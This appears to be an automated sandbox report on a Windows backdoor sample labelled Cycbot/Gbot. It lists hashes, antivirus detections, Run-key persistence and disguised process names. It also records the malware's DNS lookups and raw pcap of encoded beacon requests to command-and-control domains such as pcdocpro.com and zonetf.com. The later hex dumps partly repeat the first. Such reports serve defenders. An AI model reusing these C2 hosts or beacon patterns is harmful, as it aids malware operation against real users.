Analysis Date2014-06-15 01:33:14
MD53511ecc0b6540c04aacc15953a57ccee
SHA168593cc40e4090f61181c51cc016893574690579

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section.text md5: 389b56c0e4359d569087af5d8c8f60eb sha1: 2cf9f7f07a7f146fe7995d2da74ced2545fd34c1 size: 123904
Section.rdata md5: 2ce1140348c54dd87480f036cfbbe41e sha1: cbb694bef23352d6ed7d69887d4c8d5d6f71dcaa size: 1536
Section.data md5: 6c8a2d618d24bfd8b191a2379e319a11 sha1: 7f6d5830bc55f8fb66779a9c1af141cd8efed163 size: 39424
Section.rsr md5: 71ca7e86ec74867c678169dd9af02c55 sha1: 2ef56aec57812893f1ab1bb6c179f4a1073f6fd9 size: 512
Timestamp2005-08-27 10:17:40
VersionPrivateBuild: 1396
PEhashad84bbef0ecd29113cd044ac2165286e00ef5134
IMPhash3b4f08c11b8bdf3bcf4dcef40b8ad892
AV360 SafeGen:Trojan.Heur.KS.1
AV360 SafeGen:Trojan.Heur.KS.1
AVAd-AwareGen:Trojan.Heur.KS.1
AVAd-AwareGen:Trojan.Heur.KS.1
AVAlwil (avast)Cybota [Trj]
AVAlwil (avast)Cybota [Trj]
AVArcabit (arcavir)no_virus
AVArcabit (arcavir)no_virus
AVAuthentiumW32/Goolbot.E.gen!Eldorado
AVAuthentiumW32/Goolbot.E.gen!Eldorado
AVAvira (antivir)TR/Pakes.psa
AVAvira (antivir)TR/Pakes.psa
AVCA (E-Trust Ino)Win32/Gbot.A!generic
AVCA (E-Trust Ino)Win32/Gbot.A!generic
AVCAT (quickheal)Trojan.Pakes.gen
AVCAT (quickheal)Trojan.Pakes.gen
AVClamAVTrojan.Diple-20
AVClamAVTrojan.Diple-20
AVDr. WebTrojan.Packed.21411
AVDr. WebTrojan.Packed.21411
AVEmsisoftGen:Trojan.Heur.KS.1
AVEmsisoftGen:Trojan.Heur.KS.1
AVEset (nod32)Win32/Cycbot.AD
AVEset (nod32)Win32/Cycbot.AD
AVFortinetW32/FakeAV.PACK!tr
AVFortinetW32/FakeAV.PACK!tr
AVFrisk (f-prot)W32/Goolbot.E.gen!Eldorado (generic, not disinfectable)
AVFrisk (f-prot)W32/Goolbot.E.gen!Eldorado (generic, not disinfectable)
AVF-SecureGen:Trojan.Heur.KS.1
AVF-SecureGen:Trojan.Heur.KS.1
AVGrisoft (avg)Win32/Cryptor
AVGrisoft (avg)Win32/Cryptor
AVIkarusBackdoor.Win32.Cycbot
AVIkarusBackdoor.Win32.Cycbot
AVKasperskyBackdoor.Win32.Gbot.qr
AVKasperskyBackdoor.Win32.Gbot.qr
AVMalwareBytesSpyware.Passwords.XGen
AVMalwareBytesSpyware.Passwords.XGen
AVMcafeeBackDoor-EXI.gen.h
AVMcafeeBackDoor-EXI.gen.h
AVMicrosoft Security EssentialsBackdoor:Win32/Cycbot.G
AVMicrosoft Security EssentialsBackdoor:Win32/Cycbot.G
AVMicroWorld (escan)Gen:Trojan.Heur.KS.1
AVMicroWorld (escan)Gen:Trojan.Heur.KS.1
AVNormanwinpe/Cycbot.BH
AVNormanwinpe/Cycbot.BH
AVRisingTrojan.Win32.Generic.12742BA8
AVRisingTrojan.Win32.Generic.12742BA8
AVSophosMal/FakeAV-IS
AVSophosMal/FakeAV-IS
AVSymantecTrojan.Gen
AVSymantecTrojan.Gen
AVTrend MicroBKDR_CYCBOT.SMIB
AVTrend MicroBKDR_CYCBOT.SMIB
AVVirusBlokAda (vba32)SScope.Malware-Cryptor.Maxplus.0997

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

RegistryHKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝
1
RegistryHKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\conhost ➝
C:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe
Creates FileC:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates FileC:\Documents and Settings\Administrator\Cookies\index.dat
Creates FilePIPE\lsarpc
Creates FileC:\Documents and Settings\Administrator\Application Data\75DE.FFC
Creates File\Device\Afd\Endpoint
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe
Creates ProcessC:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe
Creates ProcessC:\malware.exe startC:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe%C:\Documents and Settings\Administrator\Local Settings\Temp
Creates ProcessC:\malware.exe startC:\Documents and Settings\Administrator\Application Data\dwm.exe%C:\Documents and Settings\Administrator\Application Data
Creates Mutex{A5B35993-9674-43cd-8AC7-5BC5013E617B}
Creates Mutex{C66E79CE-8005-4ed9-A6B1-4983619CB922}
Creates MutexWininetConnectionMutex
Creates Mutexc:!documents and settings!administrator!cookies!
Creates Mutex{61B98B86-5F44-42b3-BCA1-33904B067B81}
Creates Mutex{7791C364-DE4E-4000-9E92-9CCAFDDD90DC}
Creates Mutexc:!documents and settings!administrator!local settings!history!history.ie5!
Creates Mutex{B37C48AF-B05C-4520-8B38-2FE181D5DC78}
Creates Mutexc:!documents and settings!administrator!local settings!temporary internet files!content.ie5!
Winsock DNSbigspiderwomen.com
Winsock DNS127.0.0.1
Winsock DNSzoneij.com
Winsock DNSzonedg.com
Winsock DNSpcdocpro.com

Process
↳ C:\malware.exe startC:\Documents and Settings\Administrator\Application Data\dwm.exe%C:\Documents and Settings\Administrator\Application Data

Creates ProcessC:\Documents and Settings\Administrator\Application Data\dwm.exe

Process
↳ C:\malware.exe startC:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe%C:\Documents and Settings\Administrator\Local Settings\Temp

Creates ProcessC:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe

Process
↳ C:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe

Network Details:

DNSpcdocpro.com
Type: A
209.59.161.20
DNSzonetf.com
Type: A
208.73.211.167
DNSzonetf.com
Type: A
208.73.211.161
DNSzonetf.com
Type: A
208.73.211.250
DNSzonetf.com
Type: A
208.73.211.182
DNSzonetf.com
Type: A
208.73.211.176
DNSzonedg.com
Type: A
208.73.211.175
DNSzonedg.com
Type: A
208.73.211.168
DNSzonedg.com
Type: A
208.73.211.165
DNSzonedg.com
Type: A
208.73.210.218
DNSzonedg.com
Type: A
208.73.210.215
DNSzoneij.com
Type: A
DNSbigspiderwomen.com
Type: A
HTTP GEThttp://pcdocpro.com/images/logo-2.jpg?tq=gP4aKyd5eCO0Ust%2B%2BV3NKHhR2X7r151aUYh2dm6g8xm5g44Sk85kvaoBYX%2FLO94k4mQlYWLT1O4P5d2MY63GyQEy7ZBwZuzINd%2FUW906S%2BMenEvVh25cdR9KlDKDc1tvdo3qfDA9crrNyVsTJYIM2Hcyf9hqg5u%2Fut%2BP6R0EY9cGh30wWKrAGYoSxwOPtj%2FiJUfrxPa4Rcox9TPSRxqeUsqSiEaYLbn%2B2GfmKk5%2FOuW0OQGjB4OQqsob8gMvBIu98rIpO5ZCWeu4cXgJwEe9O%2FsTFts7YSdFlqhaE1DqyS4lvPlukAiNJO%2BkGSDkZj7A3ryi2B%2Bdqz9kOhe5mSjnjBk0H4YSJgQV7YEqqESFGoEbD1SS%2Bin1k%2FotQGzsz0ks5XeYpnIJOZVzUyJh0Z5eUxS1olcceFAt5QIV7SnQJw5VKBLNQfeK6%2Bo2Z9cKR7rACsLKos3EAS3ntJhAZbghfP0Xp16cV%2FuNeSue4dBM7qXTEzSiY2GMLL9Ah2%2F7y5Q8Ts54yPLQCeiAZmnZWYYxGbMZInxPwQ
User-Agent: iamx/3.11
HTTP POSThttp://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfJuX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOpPRO%2FUq%2F3vleWbkY%3D
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
HTTP GEThttp://zonedg.com/images/im133.jpg?tq=gKZEtzyMv5rJqxG1J42pzMffBvcj0ujbwvgS917X65rJqlLfgPiWW1cg
User-Agent: iamx/3.11
Flows TCP192.168.1.1:1031 ➝ 209.59.161.20:80
Flows TCP192.168.1.1:1032 ➝ 208.73.211.167:80
Flows TCP192.168.1.1:1033 ➝ 208.73.211.175:80

Raw Pcap
0x00000000 (00000)   47455420 2f696d61 6765732f 6c6f676f   GET /images/logo
0x00000010 (00016)   2d322e6a 70673f74 713d6750 34614b79   -2.jpg?tq=gP4aKy
0x00000020 (00032)   64356543 4f305573 74253242 25324256   d5eCO0Ust%2B%2BV
0x00000030 (00048)   334e4b48 68523258 37723135 31615559   3NKHhR2X7r151aUY
0x00000040 (00064)   6832646d 36673878 6d356734 34536b38   h2dm6g8xm5g44Sk8
0x00000050 (00080)   356b7661 6f425958 2532464c 4f39346b   5kvaoBYX%2FLO94k
0x00000060 (00096)   346d516c 59574c54 314f3450 3564324d   4mQlYWLT1O4P5d2M
0x00000070 (00112)   59363347 79514579 375a4277 5a757a49   Y63GyQEy7ZBwZuzI
0x00000080 (00128)   4e642532 46555739 30365325 32424d65   Nd%2FUW906S%2BMe
0x00000090 (00144)   6e457656 68323563 6452394b 6c444b44   nEvVh25cdR9KlDKD
0x000000a0 (00160)   63317476 646f3371 66444139 6372724e   c1tvdo3qfDA9crrN
0x000000b0 (00176)   79567354 4a59494d 32486379 66396871   yVsTJYIM2Hcyf9hq
0x000000c0 (00192)   67357525 32467574 25324250 36523045   g5u%2Fut%2BP6R0E
0x000000d0 (00208)   59396347 68333077 574b7241 47596f53   Y9cGh30wWKrAGYoS
0x000000e0 (00224)   78774f50 746a2532 46694a55 66727850   xwOPtj%2FiJUfrxP
0x000000f0 (00240)   61345263 6f783954 50535278 71655573   a4Rcox9TPSRxqeUs
0x00000100 (00256)   71536945 61594c62 6e253242 3247666d   qSiEaYLbn%2B2Gfm
0x00000110 (00272)   4b6b3525 32464f75 57304f51 476a4234   Kk5%2FOuW0OQGjB4
0x00000120 (00288)   4f517173 6f623867 4d764249 75393872   OQqsob8gMvBIu98r
0x00000130 (00304)   49704f35 5a435765 75346358 674a7745   IpO5ZCWeu4cXgJwE
0x00000140 (00320)   65394f25 32467354 46747337 59536446   e9O%2FsTFts7YSdF
0x00000150 (00336)   6c716861 45314471 7953346c 76506c75   lqhaE1DqyS4lvPlu
0x00000160 (00352)   6b41694e 4a4f2532 426b4753 446b5a6a   kAiNJO%2BkGSDkZj
0x00000170 (00368)   37413372 79693242 25324264 717a396b   7A3ryi2B%2Bdqz9k
0x00000180 (00384)   4f686535 6d536a6e 6a426b30 48345953   Ohe5mSjnjBk0H4YS
0x00000190 (00400)   4a675156 37594571 71455346 476f4562   JgQV7YEqqESFGoEb
0x000001a0 (00416)   44315353 25324269 6e316b25 32466f74   D1SS%2Bin1k%2Fot
0x000001b0 (00432)   51477a73 7a306b73 35586559 706e494a   QGzsz0ks5XeYpnIJ
0x000001c0 (00448)   4f5a567a 55794a68 305a3565 55785331   OZVzUyJh0Z5eUxS1
0x000001d0 (00464)   6f6c6363 65464174 35514956 37536e51   olcceFAt5QIV7SnQ
0x000001e0 (00480)   4a773556 4b424c4e 5166654b 36253242   Jw5VKBLNQfeK6%2B
0x000001f0 (00496)   6f325a39 634b5237 72414373 4c4b6f73   o2Z9cKR7rACsLKos
0x00000200 (00512)   33454153 336e744a 68415a62 67686650   3EAS3ntJhAZbghfP
0x00000210 (00528)   30587031 36635625 3246754e 65537565   0Xp16cV%2FuNeSue
0x00000220 (00544)   3464424d 37715854 457a5369 5932474d   4dBM7qXTEzSiY2GM
0x00000230 (00560)   4c4c3941 68322532 46377935 51385473   LL9Ah2%2F7y5Q8Ts
0x00000240 (00576)   35347950 4c514365 69415a6d 6e5a5759   54yPLQCeiAZmnZWY
0x00000250 (00592)   59784762 4d5a496e 78507751 20485454   YxGbMZInxPwQ HTT
0x00000260 (00608)   502f312e 300d0a43 6f6e6e65 6374696f   P/1.0..Connectio
0x00000270 (00624)   6e3a2063 6c6f7365 0d0a486f 73743a20   n: close..Host: 
0x00000280 (00640)   7063646f 6370726f 2e636f6d 0d0a4163   pcdocpro.com..Ac
0x00000290 (00656)   63657074 3a202a2f 2a0d0a55 7365722d   cept: */*..User-
0x000002a0 (00672)   4167656e 743a2069 616d782f 332e3131   Agent: iamx/3.11
0x000002b0 (00688)   0d0a0d0a                              ....

0x00000000 (00000)   504f5354 202f696e 6465782e 68746d6c   POST /index.html
0x00000010 (00016)   3f74713d 674b5930 73486f4c 374c2532   ?tq=gKY0sHoL7L%2
0x00000020 (00032)   424e3679 4c68627a 36323773 48644d66   BN6yLhbz627sHdMf
0x00000030 (00048)   4a755825 32425039 68253242 49307344   JuX%2BP9h%2BI0sD
0x00000040 (00064)   6b583950 69777257 4c324755 72302532   kX9PiwrWL2GUr0%2
0x00000050 (00080)   42624770 66765273 58253242 61497762   BbGpfvRsX%2BaIwb
0x00000060 (00096)   35316757 31663434 37477258 66306555   51gW1f447GrXf0eU
0x00000070 (00112)   32532532 4273536f 644f4675 544c6976   2S%2BsSodOFuTLiv
0x00000080 (00128)   30616744 68327850 36504c45 71776143   0agDh2xP6PLEqwaC
0x00000090 (00144)   476b726c 25324637 4c644250 4e705070   Gkrl%2F7LdBPNpPp
0x000000a0 (00160)   54757871 30307344 304f704c 6a527141   Tuxq00sD0OpLjRqA
0x000000b0 (00176)   4f705052 4f253246 55712532 4633766c   OpPRO%2FUq%2F3vl
0x000000c0 (00192)   6557626b 59253344 20485454 502f312e   eWbkY%3D HTTP/1.
0x000000d0 (00208)   310d0a48 6f73743a 207a6f6e 6574662e   1..Host: zonetf.
0x000000e0 (00224)   636f6d0d 0a557365 722d4167 656e743a   com..User-Agent:
0x000000f0 (00240)   204d6f7a 696c6c61 2f342e30 2028636f    Mozilla/4.0 (co
0x00000100 (00256)   6d706174 69626c65 3b204d53 49452036   mpatible; MSIE 6
0x00000110 (00272)   2e303b20 57696e64 6f777320 4e542035   .0; Windows NT 5
0x00000120 (00288)   2e31290d 0a436f6e 74656e74 2d4c656e   .1)..Content-Len
0x00000130 (00304)   6774683a 20300d0a 436f6e6e 65637469   gth: 0..Connecti
0x00000140 (00320)   6f6e3a20 636c6f73 650d0a0d 0a536446   on: close....SdF
0x00000150 (00336)   6c716861 45314471 7953346c 76506c75   lqhaE1DqyS4lvPlu
0x00000160 (00352)   6b41694e 4a4f2532 426b4753 446b5a6a   kAiNJO%2BkGSDkZj
0x00000170 (00368)   37413372 79693242 25324264 717a396b   7A3ryi2B%2Bdqz9k
0x00000180 (00384)   4f686535 6d536a6e 6a426b30 48345953   Ohe5mSjnjBk0H4YS
0x00000190 (00400)   4a675156 37594571 71455346 476f4562   JgQV7YEqqESFGoEb
0x000001a0 (00416)   44315353 25324269 6e316b25 32466f74   D1SS%2Bin1k%2Fot
0x000001b0 (00432)   51477a73 7a306b73 35586559 706e494a   QGzsz0ks5XeYpnIJ
0x000001c0 (00448)   4f5a567a 55794a68 305a3565 55785331   OZVzUyJh0Z5eUxS1
0x000001d0 (00464)   6f6c6363 65464174 35514956 37536e51   olcceFAt5QIV7SnQ
0x000001e0 (00480)   4a773556 4b424c4e 5166654b 36253242   Jw5VKBLNQfeK6%2B
0x000001f0 (00496)   6f325a39 634b5237 72414373 4c4b6f73   o2Z9cKR7rACsLKos
0x00000200 (00512)   33454153 336e744a 68415a62 67686650   3EAS3ntJhAZbghfP
0x00000210 (00528)   30587031 36635625 3246754e 65537565   0Xp16cV%2FuNeSue
0x00000220 (00544)   3464424d 37715854 457a5369 5932474d   4dBM7qXTEzSiY2GM
0x00000230 (00560)   4c4c3941 68322532 46377935 51385473   LL9Ah2%2F7y5Q8Ts
0x00000240 (00576)   35347950 4c514365 69415a6d 6e5a5759   54yPLQCeiAZmnZWY
0x00000250 (00592)   59784762 4d5a496e 78507751 20485454   YxGbMZInxPwQ HTT
0x00000260 (00608)   502f312e 300d0a43 6f6e6e65 6374696f   P/1.0..Connectio
0x00000270 (00624)   6e3a2063 6c6f7365 0d0a486f 73743a20   n: close..Host: 
0x00000280 (00640)   7063646f 6370726f 2e636f6d 0d0a4163   pcdocpro.com..Ac
0x00000290 (00656)   63657074 3a202a2f 2a0d0a55 7365722d   cept: */*..User-
0x000002a0 (00672)   4167656e 743a2069 616d782f 332e3131   Agent: iamx/3.11
0x000002b0 (00688)   0d0a0d0a                              ....

0x00000000 (00000)   47455420 2f696d61 6765732f 696d3133   GET /images/im13
0x00000010 (00016)   332e6a70 673f7471 3d674b5a 45747a79   3.jpg?tq=gKZEtzy
0x00000020 (00032)   4d763572 4a717847 314a3432 707a4d66   Mv5rJqxG1J42pzMf
0x00000030 (00048)   66427663 6a30756a 62777667 53393137   fBvcj0ujbwvgS917
0x00000040 (00064)   58363572 4a716c4c 66675069 57573163   X65rJqlLfgPiWW1c
0x00000050 (00080)   67204854 54502f31 2e300d0a 436f6e6e   g HTTP/1.0..Conn
0x00000060 (00096)   65637469 6f6e3a20 636c6f73 650d0a48   ection: close..H
0x00000070 (00112)   6f73743a 207a6f6e 6564672e 636f6d0d   ost: zonedg.com.
0x00000080 (00128)   0a416363 6570743a 202a2f2a 0d0a5573   .Accept: */*..Us
0x00000090 (00144)   65722d41 67656e74 3a206961 6d782f33   er-Agent: iamx/3
0x000000a0 (00160)   2e31310d 0a0d0a44 304f704c 6a527141   .11....D0OpLjRqA
0x000000b0 (00176)   4f705052 4f253246 55712532 4633766c   OpPRO%2FUq%2F3vl
0x000000c0 (00192)   6557626b 59253344 20485454 502f312e   eWbkY%3D HTTP/1.
0x000000d0 (00208)   310d0a48 6f73743a 207a6f6e 6574662e   1..Host: zonetf.
0x000000e0 (00224)   636f6d0d 0a557365 722d4167 656e743a   com..User-Agent:
0x000000f0 (00240)   204d6f7a 696c6c61 2f342e30 2028636f    Mozilla/4.0 (co
0x00000100 (00256)   6d706174 69626c65 3b204d53 49452036   mpatible; MSIE 6
0x00000110 (00272)   2e303b20 57696e64 6f777320 4e542035   .0; Windows NT 5
0x00000120 (00288)   2e31290d 0a436f6e 74656e74 2d4c656e   .1)..Content-Len
0x00000130 (00304)   6774683a 20300d0a 436f6e6e 65637469   gth: 0..Connecti
0x00000140 (00320)   6f6e3a20 636c6f73 650d0a0d 0a536446   on: close....SdF
0x00000150 (00336)   6c716861 45314471 7953346c 76506c75   lqhaE1DqyS4lvPlu
0x00000160 (00352)   6b41694e 4a4f2532 426b4753 446b5a6a   kAiNJO%2BkGSDkZj
0x00000170 (00368)   37413372 79693242 25324264 717a396b   7A3ryi2B%2Bdqz9k
0x00000180 (00384)   4f686535 6d536a6e 6a426b30 48345953   Ohe5mSjnjBk0H4YS
0x00000190 (00400)   4a675156 37594571 71455346 476f4562   JgQV7YEqqESFGoEb
0x000001a0 (00416)   44315353 25324269 6e316b25 32466f74   D1SS%2Bin1k%2Fot
0x000001b0 (00432)   51477a73 7a306b73 35586559 706e494a   QGzsz0ks5XeYpnIJ
0x000001c0 (00448)   4f5a567a 55794a68 305a3565 55785331   OZVzUyJh0Z5eUxS1
0x000001d0 (00464)   6f6c6363 65464174 35514956 37536e51   olcceFAt5QIV7SnQ
0x000001e0 (00480)   4a773556 4b424c4e 5166654b 36253242   Jw5VKBLNQfeK6%2B
0x000001f0 (00496)   6f325a39 634b5237 72414373 4c4b6f73   o2Z9cKR7rACsLKos
0x00000200 (00512)   33454153 336e744a 68415a62 67686650   3EAS3ntJhAZbghfP
0x00000210 (00528)   30587031 36635625 3246754e 65537565   0Xp16cV%2FuNeSue
0x00000220 (00544)   3464424d 37715854 457a5369 5932474d   4dBM7qXTEzSiY2GM
0x00000230 (00560)   4c4c3941 68322532 46377935 51385473   LL9Ah2%2F7y5Q8Ts
0x00000240 (00576)   35347950 4c514365 69415a6d 6e5a5759   54yPLQCeiAZmnZWY
0x00000250 (00592)   59784762 4d5a496e 78507751 20485454   YxGbMZInxPwQ HTT
0x00000260 (00608)   502f312e 300d0a43 6f6e6e65 6374696f   P/1.0..Connectio
0x00000270 (00624)   6e3a2063 6c6f7365 0d0a486f 73743a20   n: close..Host: 
0x00000280 (00640)   7063646f 6370726f 2e636f6d 0d0a4163   pcdocpro.com..Ac
0x00000290 (00656)   63657074 3a202a2f 2a0d0a55 7365722d   cept: */*..User-
0x000002a0 (00672)   4167656e 743a2069 616d782f 332e3131   Agent: iamx/3.11
0x000002b0 (00688)   0d0a0d0a                              ....


Strings
040904b0
1396
PrivateBuild
StringFileInfo
TIMES NEW ROMAN
Translation
VarFileInfo
VS_VERSION_INFO
$23^6/
^2~"@YheO~$
30Cx0/
3?3~37K
3?3}37K
3?3o3%K
3?3x37K
3?3y30K
3Rich6K
%3R$^M
!/4S6Q
 7aQI6
7I.~j~
&%\8}%
8|_}m{
8{(x5eN
-+8=z]
{9`]J-
	///9o5
9=U[\L"
\A4vf?0
AlphaBlend
`)AW(f
b0^V)51A!
BitBlt
b{<[Jr
bPUVvJ
ClipCursor
CoCreateInstance
CoFreeUnusedLibraries
CoInitialize
COMCTL32.dll
CoUninitialize
CreateBitmap
CreateCompatibleDC
CreateDCW
CreateDIBSection
CreatePen
CreatePopupMenu
cT[;n<(
@.data
dBiTz,p
DeleteDC
DestroyMenu
D%+oJ^
EnumResourceNamesW
ExitProcess
f4NK@m
+Fb+.^
!||fBk2
Fe\RA=
FindWindowA
FP*KG#.
GDI32.dll
GdipCreateBitmapFromFile
GdipDisposeImage
GdipGetImageHeight
GdipGetImagePixelFormat
GdipGetImageWidth
gdiplus.dll
GetDesktopWindow
GetHandleInformation
GetModuleFileNameA
GetObjectType
GetVersionExA
*GGgrc
|GHFT$
GL;Gj2Q
h-5uV'
-h+D1(
h[DV7>
}h.kqX~
H=lft:`
*hQ.h$
h<T.hT
^}HVwA
Hzs)fS
IA!KYR
ImageList_DragEnter
ImageList_DragLeave
ImageList_DragMove
[iw[=,
J.o~<s
>juH]&
J[x}M3
K%DQF!N
KERNEL32.dll
K+Gc3l
?)Kt4E
KY8Mjt
L,{_6+]
_l7bYpW
!Lc!{=
;lHuvT
LineTo
LoadLibraryW
LocalAlloc
LocalFree
Lw{8)Y
'LY"l.
/m7*:N(/
M=)~ln
MSIMG32.dll
@!n7xZ
nd?WXy
n ~@Lf
Noi3 r>
Nwm/2(
+.,&@O
&';"o5
oj0F3v_
ole32.dll
#OO";.#8
O}t-Us
pfg*fx
#PNX[;{
Q\{G(;
`Q.p_z
R1{y0Ee
r,<*.9c5
`.rdata
RedrawWindow
s^"8qL
saf8%J
>sBEB44
SelectObject
SetStretchBltMode
SE?z5m
~s*H+@
:)=SL)E
StretchBlt
StringFromGUID2
Tc/jkLR
!Te#'D
TGtoFl5
!This program cannot be run in DOS mode.
ThlFre
timeGetTime
:/TP.h
TrackPopupMenuEx
TransmitCommChar
TransparentBlt
tv9Q0Z
^<U}>\@
`\u];8
u.:fl,
USER32.dll
UY7[`fZ'2e
vA=ag~-
%vk-9q
=>VY9'
W}3&P7
:w{6	nB
wiH4wt
WINMM.dll
{)W.R4
[w+y!.7&
%)xCY%4v
x)g+t	
:y2U6Q(
y'glv@
Z}	&6i
zK{4+~
zl0(_C